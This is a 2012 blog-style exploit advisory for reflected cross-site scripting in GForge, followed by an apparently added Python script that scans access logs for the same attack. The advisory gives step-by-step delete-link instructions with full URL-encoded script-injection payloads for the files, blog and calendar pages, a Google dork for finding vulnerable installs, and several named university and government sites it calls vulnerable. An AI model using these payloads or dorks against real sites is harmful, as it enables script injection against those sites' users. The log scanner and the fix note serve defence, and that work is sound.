Monday, 30 January 2012

GForge Cross Site Scripting

# Exploit Title: GForge Cross Site Scripting
# Date: 30.01.2012
# Author: Sony

# Software Link: http://gforge.org
# Google Dorks: inurl:gf/user/ site:edu (gov,com,org,etc..) or other dorks (it's simple)
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:

http://st2tea.blogspot.com/2012/01/gforge-cross-site-scripting.html
..................................................................


Well, we have an interesting XSS in GForge.

We can test it on our own accounts. We can make 2 accounts for the test.

XSS was found in files, calendar, messagewall (search users) and blogs.

Files.


Upload our file.

http://gforge.org/gf/user/eleo/userfiles/

Press the delete button, open the link in a new window, and add our XSS to the URL.


http://gforge.org/gf/user/eleo/userfiles/my/admin/?action=UserfileDelete&file_id=3089[our xss is here]
http://gforge.org/gf/user/eleo/userfiles/my/admin/?action=UserfileDelete&file_id=3089%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E


Test this with your own account name.

Now, the blog.

Create a post, press the delete button, open the link in a new window, and add our XSS to the URL.


gf/user/eleo/userblog/my/admin/?action=UserblogDelete&id=2[xss is here]
http://gforge.org/gf/user/eleo/userblog/my/admin/?action=UserblogDelete&id=2%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E

or..


Calendar.

Open the calendar, press the "add new event" button, then press the delete button, open the link in a new window, and add our XSS to the URL.


http://gforge.org/gf/user/eleo/usercalendar/my/?action=UsercalendarEventDelete&event_id=6&redirect_to=monthview&start_date=1327881600[our xss is here]

http://gforge.org/gf/user/eleo/usercalendar/my/?action=UsercalendarEventDelete&event_id=6&redirect_to=monthview&start_date=1327881600%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E


We also have XSS in gf/my/messagewall/ (search users).



Google also shows that a lot of sites run GForge and are vulnerable to this XSS.

Joomlacode.org


Stanford.edu



https://code.ros.org/gf/account/?action=UserAdd
https://forge.si.umich.edu/gf/account/?action=UserAdd
http://media.lbl.gov/gf/account/?action=UserAdd
etc..


It's not a critical vulnerability, but it's possible to use it to change the URL for different users.
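For administrators of a GForge instance, the delete URLs above suggest a simple log check. This is an added example, not part of the original advisory or of GForge: it flags requests where `file_id`, `id`, `event_id` or `start_date` is not a plain number. It assumes those parameters are always decimal integers in legitimate use and that the access log is in combined log format; the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the advisory appends payloads to, keyed by the `action` value.
# Assumption: each is a plain decimal number in legitimate requests.
NUMERIC_PARAMS = {
    "UserfileDelete": ("file_id",),
    "UserblogDelete": ("id",),
    "UsercalendarEventDelete": ("event_id", "start_date"),
}
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
DIGITS_RE = re.compile(r"[0-9]{1,20}")

def suspicious_params(url):
    """Return [(param, decoded_value)] for numeric params that are not digits."""
    params = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    action = next((v for k, v in params if k == "action"), None)
    expected = NUMERIC_PARAMS.get(action, ())
    return [(k, v) for k, v in params
            if k in expected and not DIGITS_RE.fullmatch(v)]

def scan_log(lines):
    """Return [(line_number, param, decoded_value)] for every flagged request."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            hits.extend((number, p, v)
                        for p, v in suspicious_params(match.group(1)))
    return hits

# Constructed sample log lines (combined log format), not from a real server.
SAMPLE_LOG = [
    '203.0.113.5 - - [30/Jan/2012:10:00:01 +0000] "GET /gf/user/alice/userfiles/my/admin/?action=UserfileDelete&file_id=3089 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [30/Jan/2012:10:00:07 +0000] "GET /gf/user/alice/userfiles/my/admin/?action=UserfileDelete&file_id=3089%27%3E%3CSCRIPT%3Ealert%281%29%3C/SCRIPT%3E HTTP/1.1" 200 5301',
    '203.0.113.9 - - [30/Jan/2012:10:00:09 +0000] "GET /gf/user/alice/usercalendar/my/?action=UsercalendarEventDelete&event_id=6&redirect_to=monthview&start_date=1327881600%22%3E%3CSCRIPT%3Ealert%281%29%3C/SCRIPT%3E HTTP/1.1" 200 4410',
    '203.0.113.5 - - [30/Jan/2012:10:00:12 +0000] "GET /gf/user/alice/userblog/my/admin/?action=UserblogDelete&id=2 HTTP/1.1" 200 3000',
]

if __name__ == "__main__":
    for number, param, value in scan_log(SAMPLE_LOG):
        print(f"line {number}: {param} is not numeric: {value!r}")
```

The same integer check applied server-side, together with HTML-encoding of any parameter echoed into the page, is the corresponding fix.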
